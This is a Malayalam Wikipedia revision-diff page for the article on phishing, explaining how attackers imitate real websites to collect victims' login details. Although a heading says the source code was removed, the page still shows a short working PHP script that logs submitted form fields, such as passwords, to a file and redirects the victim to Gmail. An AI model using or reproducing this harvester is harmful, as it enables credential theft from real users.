"ഫിഷിംഗ്" എന്ന താളിന്റെ പതിപ്പുകൾ തമ്മിലുള്ള വ്യത്യാസം

(ചെ.) പിഷിംഗ് എന്ന താൾ ഫിഷിംഗ് എന്ന തലക്കെട്ടിലേയ്ക്ക് തിരിച്ചുവിടലില്ലാതെ Praveenp മാറ്റി
+
വരി 1:
{{prettyurl|Phishing}}
 
[[File:Phishing chart.png|thumb|right|ഒക്ടോബർ 2004 മുതൽ ജൂൺ 2005 വരെയുള്ള പിഷിംഗിന്റെഫിഷിംഗിന്റെ വളർച്ച സൂചിപ്പിക്കുന്ന ഒരു ചാർട്ട്.]]
 
ഹാക്കർമാർ മറ്റുള്ളവരുടെ പാസ്സ്‌വേർഡും മറ്റു പ്രധാനപ്പെട്ട വിവരങ്ങളും ഒരു എച്ച്.ടി.എം.എൽ (HTML) ടെമ്പ്ലേറ്റ് (വെബ്‌ പേജ് ) വഴി മോഷ്ടിക്കുന്ന പ്രക്രിയയെയാണ് '''പിഷിംഗ്ഫിഷിംഗ്'''.പൊതുവേ ഇമെയിൽ സ്പൂഫിംഗ് എന്ന പ്രക്രിയയിലൂടെയോ ഇൻസ്റ്റന്റ് മെസ്സഗിലൂടെയോ ആണ് പിഷിംഗ് പേജ്ന്റെ അഡ്രെസ്സ് ഹാക്കർ നൽകുന്നത്. അത് മിക്കപ്പോഴും യഥാർത്ഥം എന്ന് തോന്നുന്ന ഒരു വെബ്‌ പേജ്ലേക്ക് നയിക്കുന്നു.
 
==പ്രവർത്തനം==
==പിഷിംഗ് എങ്ങനെ പ്രവർത്തിക്കുന്നു==
നിലവിൽ പ്രചാരത്തിലുള്ള ഒരു വെബ്‌സൈറ്റിനെ അനുകരിച്ച് ആക്രമണകാരി ഒരു വെബ്സൈറ്റ് നിർമ്മിക്കുന്നു. അബദ്ധത്തിലോ പൊതുവേ ഇമെയിൽ സ്പൂഫിംഗ് എന്ന പ്രക്രിയയിലൂടെയോ ആക്രമണകാരി നൽകുന്ന ഇൻസ്റ്റന്റ് മെസേജിലൂടെയോ ആണ് ഫിഷിംഗ് താളിന്റെ വിലാസം ആക്രമണത്തിന് വിധേയനാകുന്നയാൾക്ക് തുറക്കുക. യഥാർത്ഥം എന്ന് തോന്നുന്ന അത്തരം വെബ്‌സൈറ്റിൽ ഉപയോഗിക്കുന്നയാൾ തന്റെ വ്യക്തിപരമായ വിവരങ്ങളും മറ്റും നൽകിയാൽ ആക്രമണം പദ്ധതിയിടുന്നയാൾക്ക് അത് ശേഖരിക്കാനും, യഥാർത്ഥ വെബ്സൈറ്റിൽ, യഥാർത്ഥ ഉപയോക്താവാണെന്ന വ്യാജേന പ്രവർത്തിപ്പിക്കാനും കഴിയുന്നതാണ്. സാധാരണ ഓൺലൈൻ ബാങ്കിങ് സൗകര്യം ഉപയോഗിക്കുന്നവരെയാണ് മിക്കവാറും ഫിഷിങ് ലക്ഷ്യമിടുക.
സാധാരണയായി രണ്ടു പ്രക്രിയകളാണ് പിഷിംഗിനുള്ളത്. ആവശ്യമുള്ള വിവരങ്ങൾ ചോദിച്ചു കൊണ്ട് ഒരു വെബ്‌ പേജ്(എച്ച്.ടി.എം.എൽ).
ഉദാഹരണത്തിന് ജി-മെയിൽ പിഷിന്റെ സോർസ് കോഡ് താഴെ കൊടുക്കുന്നു.
 
== ഇതൊരു ഹാക്കിംഗ് പ്രവർത്തി ആയതുകൊണ്ട് സോർസ് കോഡ് എടുത്തു കളയുന്നു ==
ഇ ജി-മെയിൽ പിഷിന്റെ സോർസ് കോഡ് ഒരു ജിമെയിൽ വെബ്‌ പേജ് ആയി പ്രവർത്തിക്കുന്നു
 
പിന്നെ ഇതെല്ലാം സേവ് ചെയ്യുന്ന ഒരു പ്രോഗ്രാം(പി.എച്ച്.പി കോഡ്)
 
<?php
header("Location: http://www.gmail.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 
[[വർഗ്ഗം:ഹാക്കിംഗ്]]
"https://ml.wikipedia.org/wiki/ഫിഷിംഗ്" എന്ന താളിൽനിന്ന് ശേഖരിച്ചത്